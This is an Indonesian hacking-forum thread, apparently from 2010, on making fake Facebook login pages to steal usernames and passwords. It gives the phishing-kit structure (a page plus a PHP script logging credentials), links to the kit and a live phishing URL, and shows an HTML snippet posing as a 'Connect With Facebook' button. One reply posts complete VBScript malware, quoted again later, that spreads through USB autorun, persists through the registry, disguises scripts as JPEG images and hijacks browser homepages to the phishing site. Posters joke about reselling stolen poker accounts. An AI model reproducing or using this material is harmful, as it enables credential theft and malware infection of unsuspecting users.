Facebook Fake Login

Post by **anharku** » Fri Jun 25, 2010 2:38 pm

maaf saya hanya newbie yang ingin berbagi..
langsung saja kaitanya dengan fake login...
fake login yaitu halaman login palsu dimana
user yang tidak mengerti akan menganggap halaman web tersebut adalah asli padahal halaman tersebut palsu jika dicermati bagian alamat/address url nya. Banyak contoh kasus FAKE URL atau biasa disebut teknik phising ini misalnya kasus plesetan nama klikbca.com diplesetkan menjadi klickbca.com. User yang salah mengetikkan alamat url tersebut mengunjungi website yang sama padahal web tersebut hanyalah jebakan dari Black Hacker untuk mendapatkan username password. Contoh kasus yang lain adalah Fake login dari FRIENDSTER, Fake Login dari FACEBOOK.

kasus yang fb aja yagh.....
contok fb fake login ya kaya gini nih:

http://www.0-facebook.co.tv/

untuk membuat halaman fake login seperti itu caranya sebagai berikut:
siapkan:
• index.html (halaman facebook palsunya)
• logs.php (script untuk mengirimkan data user pass ke file logs.txt)
• logs.txt (file txt kosong saja, sebagai tempat penyimpanan user dan password)
Upload ketiga script tersebut ke hostinganmu lalu kamu sebarkan saja alamat /url fake login tersebut..
terserah kamu mau pake cara apa :circle:
download sourcenya disini:
http://www.4shared.com/file/jTeUmjvo/fb_f4kel0g1n.html

BUT YANG UDAH NGERTI CARA2 INI PASTI GA AKAN KENA JEBAKAN BATMAN :devil

semoga bermanfaat ilmunya :kaca:

salam
anharku
http://codenesia.com

Nol Sembilan Tiga · Post by **Nol Sembilan Tiga** » Fri Jun 25, 2010 4:25 pm

wah bukannya ini ya om.. tp nih dah basi... :ngakak: :ngakak:

Post by **Darkzzzz** » Fri Jun 25, 2010 5:02 pm

Tambahan :
POC = http://forum.xcode.or.id/viewtopic.php?f=99&t=36475
By : XShadow

POC sejenis (By : Darkzzzz)
<a href="http://www.fakelogingua.com"><img src="http://vir2day.phpnet.us/nyit2/connect.gif"></a>
Taroh di blog atau site kamu, seolah-olah ini adalah tombol "Connect With Facebook", padahal mah bukan :ngakak:

Nol Sembilan Tiga · Post by **Nol Sembilan Tiga** » Fri Jun 25, 2010 7:36 pm

:ngakak: :ngakak:

awas menipu itu gak baik.. tar masuk neraka...

xlinkprince · Post by **xlinkprince** » Fri Jun 25, 2010 8:14 pm

Nol Sembilan Tiga wrote::ngakak: :ngakak:

awas menipu itu gak baik.. tar masuk neraka...

bener nih..... :gebrak:

Post by **Darkzzzz** » Sat Jun 26, 2010 1:28 am

Soal masuk neraka belakangan, yang penting Chip Poker :devil
wekekekke....

warxdoyo · Post by **warxdoyo** » Sat Jun 26, 2010 7:05 am

Darkzzzz wrote:Soal masuk neraka belakangan, yang penting Chip Poker :devil
wekekekke....

bener banget yang di blg bang drakzzz yang penting chips poker.. mana tau ada kan lumayan

hahahahahha

di jual lagi deh chips poker`n kalo udh berhasil mendapat kan beberapa acount... :devil :devil

Post by **anharku** » Sat Jun 26, 2010 8:54 am

maaf kalo ini dagh basi :maaf:

yagh namanya juga newbie yang pengen berbagi...
sape tau ada yang belom ngerti :circle:

makasih kakak2 yang udagh nambahin...
terutama momod Darkzzzz yang warnannya ijo ntu :love:

Post by **Darkzzzz** » Sat Jun 26, 2010 10:54 am

Gini lho mas anharku, mungkin mas bisa menyempurnakan script ini?

Code: Select all

'Trojan.Gen.FBFL 1.0


'(C) 2010 XCode.or.id


 

On Error Resume Next

Dim abc,def,ghi,jkl,r

Set abc = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))

Set def = CreateObject(StrReverse("llehS.tpircsW"))

Set ghi = abc.GetSpecialFolder(2)

Set jkl = abc.GetFile(Wscript.ScriptFullName)

jkl.Copy (ghi & "\DSC10876.Jpg.vbe")

 

For r = 1 To 3

If r = 1 Then

mno_pqr

End If

If r = 2 Then

stu_vwx

End If

If r = 3 Then

efg_hij

End If

Next

 

Sub stu_vwx()

On Error Resume Next

Dim yza,Drive,Drives,bcd

For Each yza In abc.Drives

If (yza.DriveType = 1 Or yza.DriveType = 2) And yza.Path <> "A:" Then

efg_hij(yza.Path&"\")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.jpg.vbe")

bcd.Attributes = 32

abc.CopyFile ghi & "\DSC10876.Jpg.vbe",(yza.Path & "\DSC10876.Jpg.vbe")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.Jpg.vbe")

bcd.Attributes = 31

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 32

Set bcd = abc.CreateTextFile(yza.Path & "\autorun.inf")

bcd.WriteLine ";-----------------------------------------------------------"

bcd.WriteLine "[AUTORUN]"

bcd.WriteLine "Open=DSC10876.jpg.vbe"

bcd.WriteLine "Shellexecute=wscript.exe DSC10876.Jpg.vbe"

bcd.Close

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 31

End If

Next

mno_pqr

End Sub

 

Sub mno_pqr

On Error Resume Next

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox","firefox http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WGA",syspath & "\DSC10876.Jpg.vbe"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL","http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://facebook.co.cc"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\System32\wshext.dll,-4802","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Script Extensions\.VBS\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","shimgvw.dll,3"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\","shimgvw.dll,3"

efg_hij

End Sub

 

Sub efg_hij()

On Error Resume Next

Dim klm, nop

klm = def.SpecialFolders("AppData") & "\Mozilla\Firefox\Profiles"

If abc.FolderExists(klm) Then

For Each nop In abc.GetFolder(klm).SubFolders

klm_nop (nop)

Next

End If

End Sub

 

Sub klm_nop(klm)

On Error Resume Next

Dim bcd

Set bcd = abc.GetFile(klm & "\prefs.js")

bcd.Delete

Set bcd = abc.CreateTextFile(klm & "\prefs.js", True)

bcd.WriteLine "# Mozilla User Preferences"

bcd.WriteBlankLines (2)

bcd.WriteLine "user_pref(" & chr(34) & "browser.startup.homepage" & chr(34) & ", " & chr(34) & "http://facebook.co.cc" & chr(34) & ");"

bcd.Close

End Sub

Script di atas berfungsi untuk memanipulasi Firefox & Internet Explorer supaya masuk ke FakeLogin ... :devil
Wah kan keren tuh mas misalnya ada Malware yang bisa automatisasi giring mangsa ke FakeLogin :licik:

warxdoyo · Post by **warxdoyo** » Sat Jun 26, 2010 11:21 am

Darkzzzz wrote:Gini lho mas anharku, mungkin mas bisa menyempurnakan script ini?

Code: Select all

'Trojan.Gen.FBFL 1.0


'(C) 2010 XCode.or.id


 

On Error Resume Next

Dim abc,def,ghi,jkl,r

Set abc = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))

Set def = CreateObject(StrReverse("llehS.tpircsW"))

Set ghi = abc.GetSpecialFolder(2)

Set jkl = abc.GetFile(Wscript.ScriptFullName)

jkl.Copy (ghi & "\DSC10876.Jpg.vbe")

 

For r = 1 To 3

If r = 1 Then

mno_pqr

End If

If r = 2 Then

stu_vwx

End If

If r = 3 Then

efg_hij

End If




beh ternya eh ternyata bang drakzzz sadit juga yah...

jar`n bang gmn lakuin`n??


Next

 

Sub stu_vwx()

On Error Resume Next

Dim yza,Drive,Drives,bcd

For Each yza In abc.Drives

If (yza.DriveType = 1 Or yza.DriveType = 2) And yza.Path <> "A:" Then

efg_hij(yza.Path&"\")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.jpg.vbe")

bcd.Attributes = 32

abc.CopyFile ghi & "\DSC10876.Jpg.vbe",(yza.Path & "\DSC10876.Jpg.vbe")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.Jpg.vbe")

bcd.Attributes = 31

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 32

Set bcd = abc.CreateTextFile(yza.Path & "\autorun.inf")

bcd.WriteLine ";-----------------------------------------------------------"

bcd.WriteLine "[AUTORUN]"

bcd.WriteLine "Open=DSC10876.jpg.vbe"

bcd.WriteLine "Shellexecute=wscript.exe DSC10876.Jpg.vbe"

bcd.Close

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 31

End If

Next

mno_pqr

End Sub

 

Sub mno_pqr

On Error Resume Next

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox","firefox http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WGA",syspath & "\DSC10876.Jpg.vbe"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL","http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://facebook.co.cc"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\System32\wshext.dll,-4802","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Script Extensions\.VBS\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","shimgvw.dll,3"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\","shimgvw.dll,3"

efg_hij

End Sub

 

Sub efg_hij()

On Error Resume Next

Dim klm, nop

klm = def.SpecialFolders("AppData") & "\Mozilla\Firefox\Profiles"

If abc.FolderExists(klm) Then

For Each nop In abc.GetFolder(klm).SubFolders

klm_nop (nop)

Next

End If

End Sub

 

Sub klm_nop(klm)

On Error Resume Next

Dim bcd

Set bcd = abc.GetFile(klm & "\prefs.js")

bcd.Delete

Set bcd = abc.CreateTextFile(klm & "\prefs.js", True)

bcd.WriteLine "# Mozilla User Preferences"

bcd.WriteBlankLines (2)

bcd.WriteLine "user_pref(" & chr(34) & "browser.startup.homepage" & chr(34) & ", " & chr(34) & "http://facebook.co.cc" & chr(34) & ");"

bcd.Close

End Sub

Script di atas berfungsi untuk memanipulasi Firefox & Internet Explorer supaya masuk ke FakeLogin ... :devil
Wah kan keren tuh mas misalnya ada Malware yang bisa automatisasi giring mangsa ke FakeLogin :licik:

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Facebook Fake Login

Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login

Re: Facebook Fake Login